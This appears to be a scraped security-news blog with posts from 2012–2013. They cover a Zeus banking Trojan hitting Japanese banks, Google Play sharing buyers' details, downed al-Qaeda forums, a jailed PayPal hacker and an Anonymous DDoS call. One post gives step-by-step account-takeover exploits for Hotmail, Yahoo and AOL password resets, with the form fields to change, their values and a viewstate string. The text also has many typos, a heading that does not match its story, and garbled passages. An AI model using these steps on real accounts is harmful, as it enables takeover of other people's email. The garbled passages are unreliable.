Saturday, February 16, 2013

Zeus banking Trojan in Japan


Zeus banking Trojan targeting five major banks in Japan
Zeus continues to strike online bank accounts and users, and technology designed to thwart these Trojan attacks continually fails to keep up. Symantec recently came across a new Zeus file targeting five major banks in Japan.

The malware, which has caused serious problems to banking customers in Europe and the U.S, now having maximum concentration on Japanese banks. Target information was reveled by Symantec after decryption of configuration file from new sample. The attacker uses Blackhole exploit kit in order to install Zeus
eus, a financially aimed malware, comes in many different forms and flavors. It can be tweaked to hijack personal PCs, or come in the form of a keylogger that tracks keystrokes as users enter them.
target
But once installation over, Zeus malware aims to steal online-banking credentials, and phishing schemes and drive-by downloads are most often the avenues hackers use to spread this increasingly sophisticated and evolving Trojan.

In this case, the functionality is the same as that of other Zeus variants. Once infected, Zeus monitors the Web browser visiting the targeted banks and injects HTML code that displays a message in Japanese that states in English: "In order to provide a better service to our customers, we are updating our personal internet banking system. Please re-enter the information that you provided when you first registered.".

Zeus gained notoriety in 2006 as being the tool of choice for criminals stealing online banking credentials. If your are one of the victim of Zeus, we recommend that you change your passwords for your online accounts and if you have used your credit card while Zeus Trojan was on your computer, contact the bank and let them know that you might be be victim of a phishing attack.

Google Play privacy issue, sends app buyers personal details to developers


Google Play privacy issue, sends app buyers personal details to developers
Google is again under attack for its apparent mishandling of its users’ personal information. An Australian software developer 'Dan Nolan' revealed that the search giant was sending him the full names, email and post codes of everyone who purchased his app on Google's Play.merchant account to update his payment details
The main problem is that Google is not asking explicit permission from buyers to share that information with developers, but according to privacy groups and with careful inspection of the policies, Google does not clearly mention that it is sharing personal information to app developers nor does it create a good deal of effort in informing buying customers.

The sign-up process for Google Wallet tells prospective users that they will need to share some basic information with merchants to conduct their transactions. But from a practical point of view, many people seemed blindsided by the news that their information was being shared. There was a mention that developers could take any type of personal information and still sell it to another party.

Last year, Google was accused of violating the consent order by placing tracking cookies on the computers of Safari users, despite telling those same users they would be automatically opted-out of such tracking. Google agreed to pay a record $22.5 million to the FTC.

Sunday, April 29, 2012

Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities






Password+Reset+Vulnerability

Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose.





Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.”

Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result.

Here Below Hacker Demonstrated Vulnerabilities:
1.) Hotmail :
1

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password 
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

2.) Yahoo
1

Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2. EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password 
Step 6. Start Tamper Data All in Element Z
Step 7.done
3.) AOL:
1

Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data 
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password 
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done


Saturday, April 7, 2012

Al-Qaeda websites under attack


Al-Qaeda websites hacked and remains down for past 12 days
Al-Qaeda+websites+hacked+and+remains+down+for+past+12+days

Al-Qaeda's main internet forums have been offline for the past 12 days in the longest sustained outages of the sites since they began operating. Several online forums frequently visited by al-Qaeda operatives were downed over the course of the last few weeks, including two of the terrorist organization’s top sites, al-Fida and Shamukh al-Islam.

No one has claimed responsibility for disabling the sites but the breadth and duration of the outages have prompted speculation the forums have been taken down in a cyber attack launched perhaps by a government or hacking group.

The digital sabotage could have been carried out by any number of governments or private hackers, said James Lewis, director of the technology and public policy program at the Center for Strategic and International Studies.

Some analysts have speculated that the administrators of the sites might have taken them down if they suspected that the forums had been infiltrated by foreign spies.

Repeated attacks probably will force the jihadists to improve their security, making it more difficult for any intelligence agency trying to hack any network.

The Shumkah site went live again Wednesday with a message that the cyberattack was “a failed, miserable campaign,” according to a translation of the message by security consultant Flashpoint Partners.“

Friday, April 6, 2012

Your girlfriend is so stupid


British Paypal hacker jailed for stealing millions Identities
hacker+jailed+for+stealing

A UK cybercrook has been jailed for 26 months following his conviction for stealing millions of banking and PayPal identities. According to Report, Southwark Crown Court heard how Edward Pearson, 23, could have made about £834,000 if he chose to use the information he hacked out of people's Paypal accounts.

Pearson, an 'incredibly talented' boarding school student who carried out the crime for an ‘intellectual challenge’, has been jailed for two years and two months.

"One of his programs scanned through 200,000 accounts registered to online payment service PayPal - identifying names, passwords and current balances." according to the Daily Mail.

Pearson might have been able to cash out the compromised accounts and make hundreds of thousands in ill-gotten gains. But in the event he actually only made £2,400 before his 21-year-old student girlfriend, Cassandra Mennim, used stolen credit cards to book rooms at two upmarket York hotels, transactions that put police of the trail of the pair. Investigators then linked Pearson's email address to an online identity, G-Zero, which he was purported to have used on underground hacking forums.

The original charges show that Pearson and his girlfriend were also dealing the drug MDVP, but these were dropped. Pearson admitted to making an article for use in fraud and two counts of possession of an article for use in fraud. Mennim admitted to two counts of obtaining services dishonestly.

Pearson also is also allged to have hacked into Nokia’s network back in August 2011, prompting the telecoms giant to shut down its internal network for two weeks.

Anonymous again


Anonymous Plans 7 April Attack on British government
Anonymous+Plans+7+April+Attack+on+British+governmentUK hackers linked to the Anonymous group are encouraging supporters to attack the Home Office website this Saturday (7 April) in protest at the extradition of three UK citizens to the US. Called#OpTrialAtHome, the hacktivist group @AnonOpUK posted a warning on its Twitter page that an attack on the Home Office was planned for Saturday, 7 April.
An associated photo/poster shows images of Gary McKinnon, Richard O’Dwyer and Christopher Tappin. McKinnon and O’Dwyer are awaiting extradition from the UK to the US. Tappin’s extradition was effected on 24 February when he was flown to El Paso, Texas.
Supporters have been encouraged to launch denial-of-service attacks on the Home Office's IP address, which Anonymous has revealed. Those not savvy enough to launch automated attacks on the site could contribute to the effect by simply visiting the site in large numbers.

Julian Assange, the editor-in-chief and founder of WikiLeaks, was arrested in the UK under an EAW issued by Sweden, and is currently fighting extradition to Sweden.McKinnon, a Scottish systems administrator, was arrested in 2002 for allegedly hacking into US military and Nasa computers in 2001 and 2002 and deleting files and copying data.

Tappin, a retired British businessman, is accused by the US government of illegally exporting materials to Iran for building surface-to-air missiles.

O'Dwyer, the owner of TVShack.net, is charged with hosting copyrighted materials on his site and the US Justice Department has been seeking his extradition since May 2011.

Anonymous’ #OpTrialAtHome is timed to commence at 9:00pm on Saturday, April 7, with a DDoS attack on the Home Office website.